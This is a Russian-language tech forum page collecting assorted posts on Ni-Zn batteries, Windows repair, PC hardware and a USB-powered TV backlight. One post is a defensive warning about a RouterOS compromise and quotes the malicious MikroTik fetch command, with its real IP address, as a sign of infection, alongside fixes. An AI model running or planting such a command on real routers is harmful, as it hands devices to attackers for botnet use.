mah. Кто бы ещё в это поверил. Будем надеяться что на самом деле где-нибудь 700-1000 mah. Что в принципе тоже неплохо. Насчет тока заряда так же нет однозначных сведений, некоторые рекомендуют зарядный ток в 0,5-1 величины ёмкости, то есть до ампера. Но как мне представляется ток лучше особо не задирать, а лучше что бы он был до 0,5 от ёмкости. Ток не обязательно высчитывать и устанавливать слишком уж точно. Слишком маленький ток увеличивает время заряда, не исключено что до бесконечности. Слишком большой ток может испортить аккумулятор. При нормальном заряде аккумуляторы не должны заметно нагреваться. Минимальное напряжение (то есть такое, ниже которого аккумулятор разряжать нельзя) 1,2 вольта на элемент, чуть выше чем у NiCd, NiMH аккумуляторов (1,0), а вот максимальное - 1,9 вольт, против 1,4 у указанных. Вопрос чем заряжать такие аккумуляторы может возбудить неслабый холивар: Некоторые говорят что требуется или специальное зарядное устройство, или универсальное, но такое которое имеет официальную поддержку Ni-Zn аккумуляторов. Другие доказывают что подойдет любое зарядное устройство для NiCd, NiMH аккумуляторов. Мой ответ прост, - хотим по уму, нужно специальное. Хотим по колхозному, - включаем вашу зарядку в сеть без аккумуляторов, и измеряем напряжение на клеммах. Если оно не дотягивает до 1,9 вольт, то стало быть нет. А если "перетягивает", то да, но на свой страх и риск. Есть еще особенности: Как я указал выше, напряжение на свежезаряженном аккумуляторе - 1,9 вольт. И если NiCd, NiMH аккумуляторы после заряда довольно быстро сбрасывают напряжение до рабочего (1,2 с чем-то там), то Ni-Zn будет еще довольно долго удерживать где-нибудь 1,8 вольт. Например если тот или иной аппарат рассчитан на три обычных батарейки, то вместо 4,5 вольт при использовании таких аккумуляторов мы получим 5,4 вольта. А это уже довольно заметное превышение, и к аппарату может придти пушной зверек. Так что напряжением у этих аккумуляторов лучше считать не 1,6, а 1,7-1,8 вольт. Потому Ni-Zn аккумуляторы нежелательно сразу после заряда устанавливать в аппаратуру чувствительную к превышению напряжения. Для того что бы напряжение пришло в норму, придётся подождать некоторое, довольно длительное время. Потому если какая-то нужная аппаратура работает от таких аккумуляторов, лучше иметь их два-три комплекта, один-два из которых будут заряжаться и потом "отлеживаться", в то время когда другой работает. Так же довольно неприятной особенностью является ограниченный ресурс, всего 250-350 циклов заряд-разряд. Где использовать: Аппаратура терпящая некоторое превышение напряжения питания. Скорее всего [вероятно] будут нормально работать разные электромеханические игрушки, или старая аппаратура, типа приёмника с "веревочной" настройкой, изначально рассчитанного только на батарейки. Напряжение на свежей качественной батарейке тоже может быть несколько выше чем 1,5 вольта, так что может быть выживет. Насчет современной цифровой техники вроде фотоаппаратов - на свой страх и риск, прогугля эту тему. Купил я как-то хороший такой мощный "профессиональный" налобный фонарик, типа для туристов и спелеологов. Мощный фонарь, и на затылке кассета на 4 батарейки. Вставил эти аккумуляторы, - и полсекунды не прошло, - светодиоду кирдык. Некоторые однозначно рекомендуют такие аккумуляторы для светодиодных фонариков, но я бы поостерегся. Как эти аккумуляторы используются у меня: Никак не используются. Я их купил для указанного выше фонарика... но видно не судьба. Были разные проекты, где можно было бы их использовать, да что-то не срослось. Практически я эти аккумуляторы нигде не использовал, так как у меня нет какой-то аппаратуры где бы их можно было использовать. Другие материалы по данным аккумуляторам: https://www.youtube.com/watch?v=W6bmJgJo4J8 https://www.youtube.com/watch?v=kRd0TRDTgT4 https://ru.wikipedia.org/wiki/Никель-цинковый_аккумулятор https://mysku.ru/blog/aliexpress/33789.html https://kirill1985.ru/pokupka/3429-nizn-akkumulyatory.html Как говорится - думайте сами, решайте сами, иметь или не иметь.
  38. 1 point
  39. 1 point
    Всё таки я склоняюсь к мысли что дело тут в ОС, а не в самом диске D. Может быть попробовать зайти в диспетчер задач, там могут работать какие-то процессы от недоудаленных антивирусов. Ну и поубивать их. (Современные антивирусы хуже прилипал каких-то, я как-то раньше пытался корректно удалить AVG Free, так и не смог. "Внутренняя безопасность" антивируса пресекает любые попытки помешать его работе, даже со стороны собственного деинсталлятора). Так же можно зайти в Службы, и посмотреть что связано с антивирусами. Ну и вообще, куда только можно. Насчет переустановки Винды так же не возражаю, при чем не исключаю что если переустановить Винду, то проблемы с диском D решатся сами собой.
  40. 1 point
    Знаете, граждане... Лично я - пока прекрасно себя чувствую на AM3+ сокете, четырёхголовом камне и видюшкой HD7870. Последняя Metro: Exodus нормально работает на примерно 45-57 FPS, чего более чем достаточно. Да, настройки - Medium, но лично меня - больше интересует игра как таковая, а не пальцегнутие по поводу настроек... Не, кто б мне денег поболе дал - я бы и Штеуд'а последнего взял, али Райзена... Но - хватает головы просто всё нормально настроить, исходя из имеющегося. То бишь, как по мне - лучше за терпимые деньги взять годовой давности ТОП, который ещё лет пять будет хорош, нежели за большие бабки брать сейчас полутоп, который что ныне середняк, что потом - ещё того хуже...
  41. 1 point
    Судя по скриншоту система видит только цифровой вывод звука (через HDMI). Попробуйте в диспетчере устройств для "Устройства с поддержкой High Definition Audio" посмотреть другие доступные совместимые драйверы (там иногда системой предлагается несколько вариантов). Если ничего подходящего нет, создайте точку восстановления системы и попробуйте подсунуть в диспетчере устройств для этого устройства драйвер от Windows 7 (той же разрядности, разумеется).
  42. 1 point
    Спасибо. Взаимно всем всего самого нилучшего ** Когда идёт не по прямой, А вечные кривые. Тогда проблемы с головой, Ни раз не бытовые. А если вечно прямо, то – Лечиться нужно срочно. Могу поспорить – рупь за сто. Ты сумасшедший точно. Равны, что гений, идиот – Болезнь (тут на латыни). Нормальным будет только тот, Кто где-то в середине. ***
  43. 1 point
    Загрузка за 5 секунд? На м2 винтах вообще все летает. Хорошие агрегаты, правда дорогие, зараза... Но к лету будет сильный обвал цен (прядка 30-40%) на чипы памяти (технологии развиваются, и переход на новый процесс производства принес свои положительные плоды), вместе с ними упадут цены на всю ссд продукцию. Обычные модули памяти тоже упадут в цене, правда не так сильно.
  44. 1 point
    Надеюсь планки идентичны. 1) Проверь батарейку для BIOS. 2) Выставить тайминги для планок памяти принудительно. Для спокойствия прогони memtest. глянь. не просел ли Блок питания... . Также и конденсаторы на матери.
  45. 1 point
    Немного возвращаюсь к задней (фоновой) подсветке для телевизоров (и мониторов). Всё что тут описано НЕ является Ambilight, то есть никак не не связано ни с изображением на экране телевизора (монитора), ни с его звуковым сопровождением. Применяется такая подсветка для уменьшения нагрузки на глаза, при просмотре телевизора в темноте. Я уже делал заднюю подсветку для телевизора на основе т.н. лампы настроения на трёх мультивибраторах. Работало это всё вполне сносно, но питание шло от БП на 12 вольт, который требовалось включать и выключать отдельно от телевизора. Да и эффект был всего один, хотя и непредсказуемый. Решил пойти по другому пути, а именно питание подсветки взять от USB порта телевизора. Теперь пожалуй на всех, даже самых простых и дешевых телевизорах имеется хотя бы один такой порт. Таким образом подсветка включается и выключается одновременно с телевизором. Скажу сразу - я тут ничего не изобрёл, тема эта уже давно находится что называется "в разработке". В продаже имеются RGB светодиодные ленты с питанием 5 вольт, похоже специально предназначенные для питания от USB. А так же специальные контроллеры, как с пультом ДУ, так и без него, с управлением от кнопок на самом контроллере, так же способные работать от 5 вольт. Так же есть различные прочие приблуды - коннекторы, переходники, различные удлинители, и т.п.. Контроллер в любом случае "одним концом" подключается к USB, а другим - к RGB ленте. Для начала купил полный комплект из светодиодных лент, различных удлинителей и коннекторов, и RGB контроллера с пультом дистанционного управления. Выглядит такой контроллер так: Испытания показали что работает это всё не очень надежно. Хотя имелись и положительные отзывы, возможно мне не повезло, или я что-то не так сделал. Работало это всё неустойчиво, то работает, то нет. Дальность действия пульта не особо большая. Контроллер будучи подключен к телевизору не запускался при его включении, надо было "передернуть" шнур USB. Вероятно дело в каких-то помехах по питанию, мне по крайней мере так показалось. По некоторым сведениям пульт от этого контроллера мешает телевизору, который так же реагирует на сигналы этого пульта. Хотя я сам это не наблюдал. Потому эти контроллеры с пультами были отложены в долгий ящик. Но ленты остались, как и разные прочие коннекторы и удлинители, потому был куплен контроллер без пульта. Выглядят они похоже, только на них имеются кнопки: Этот контроллер показал более надежную работу, по крайней мере кнопок слушается четко, установленные настройки сохраняются и после отключения питания. Что он может, и для чего все эти кнопки тут описывать не буду, одно могу сказать, - имеется много разных эффектов, которыми я пользоваться конечно не буду. В разных телевизорах могут быть разные порты, рассчитанные на разные токи. В моем телевизоре два USB порта. Один для флешек, выдает до 500 mA, и более мощный порт для жестких дисков выдает ток до 1А. Конечно могут быть и иные варианты, тут надо разобраться конкретно со своим телевизором, какие у него есть порты, и не превышать ток порта. Установить ток мы сможем только подбирая длину ленты. Потому если есть сомнения, желательно сначала подключить контроллер с лентой не к телевизору или компьютеру, а какому-то блоку питания с USB портом через USB-тестер, или амперметр (мультиметр), установить на контроллере белый свет (т.е. зажечь все три канала с максимальной яркостью), и подбором длины ленты установить допустимый для того или иного порта ток. Так у меня используется всего два куска ленты, горизонтально, сверху и снизу телевизора, каждая по 52 см. (Минимальный кусочек - 3,5 см). В максимальном режиме они потребляют 650 mA, потому включены в более мощный порт. Обычно ленты наклеивают сзади на сам телевизор по периметру вблизи краев. Но так делать совсем не обязательно, ленту можно разместить и за телевизором, например на стене, изнутри ниши мебельной стенки, или на каком-то другом предмете. Но таким образом, что бы был виден свет от ленты падающий на окружающие предметы, но не сама лента. Насчет цвета и различных эффектов (чисто моё мнение). Всевозможные мигания и вспышки, столь любимые китайцами, использовать крайне нежелательно. Если зритель не китаец, то повторяющийся эффект быстро надоест и вызовет раздражение и глаз и нервов. Вообще лучше использовать белый, или какой-то очень слабо насыщенный светлый цвет вроде желтого, яркостью примерно такой же как яркость экрана. Использование ярких и насыщенных цветов может привести к искажению цветовосприятия и неприятным ощущениям. Слабо насыщенный цвет, то есть слегка подкрашенный белый при помощи RGB ленты получить довольно трудно, тут лучше использовать RGBW ленту, о которой уже говорилось в этой теме. Возможно вскорости займусь чем-то подобным, с 12-вольтовой RGBW лентой, поскольку их есть у меня... пять метров. Включаться и выключаться это всё будет автоматически вместе с телевизором. Ну и как это всё реализовано у меня: Контроллер у меня не закреплен сзади, а болтается на проводах снизу: Для удобного доступа, что бы если что-то захочется поменять не лазить за телевизор. Остальное я или подписал, или так понятно. При сборке использовались только покупные узлы, пайка не применялась. Ленты закреплены на двусторонний скотч описанный в предыдущем посте.
  46. 1 point
    Не люблю круглые цифры
  47. 1 point
    А то! :) Привет! Давненько тебя не видно было. Как дела? Новый год с елкой будешь отмечать?
  48. 1 point
    23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS. Причем уязвимость позволяет узнать логин и пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно. Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро. Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них: /tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http В файлах соответственно mikrotik.php Отключаются все запрещающие правила фаервола. Создаются задачи в планировщике по запуску скрипта. Открывается сокс-прокси на нестандартном порту. Меняются адреса днс-серверов. Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака. Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа. Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации. Ну пару советов по безопасности: IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные. Грамотно настроить фаерволл. В случае если факт взлома был зафиксирован - сменить пароль на микротик. Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533
  49. 1 point
    HelgaKiev Звуков и не будет. Ж. диск просто накрылся "медным тазом". Ставьте другой и вперед! Бывает еще такая странная канитель. Где-то с полгодика назад, притараканили мне один ноут, со схожими симптомами. Разбираю, вытаскиваю винт, ноут грузится, ставлю винт на место, ноут грузится. Закрыл крышку, перестал загружаться. Открываю, снимаю винт, проверяю, а там сата коннектор полетел. И такое бывает... Вообще, я вам замечу, ноутбуки это - заведомый геморрой! Поэтому, все адекватно мыслящие люди, собирают стационары; проблем с ними меньше! ;)
  50. 1 point
    OVERLORD, в любом ПО для записи дисков есть опция "Запись из образа". При этом в программе обычно предлагается указать тот самый ISO-файл, из которого будет записываться диск. Простая запись ISO-файла на диск ничего не даст. ISO-файл представляет собой, грубо говоря, архив, внутри которого, помимо пользовательских файлов, есть ещё различные служебные участки, куда как раз таки записывается загрузчик Windows, который потом запускается при загрузке с болванки.
This leaderboard is set to Moscow/GMT+03:00


×
×
  • Create New...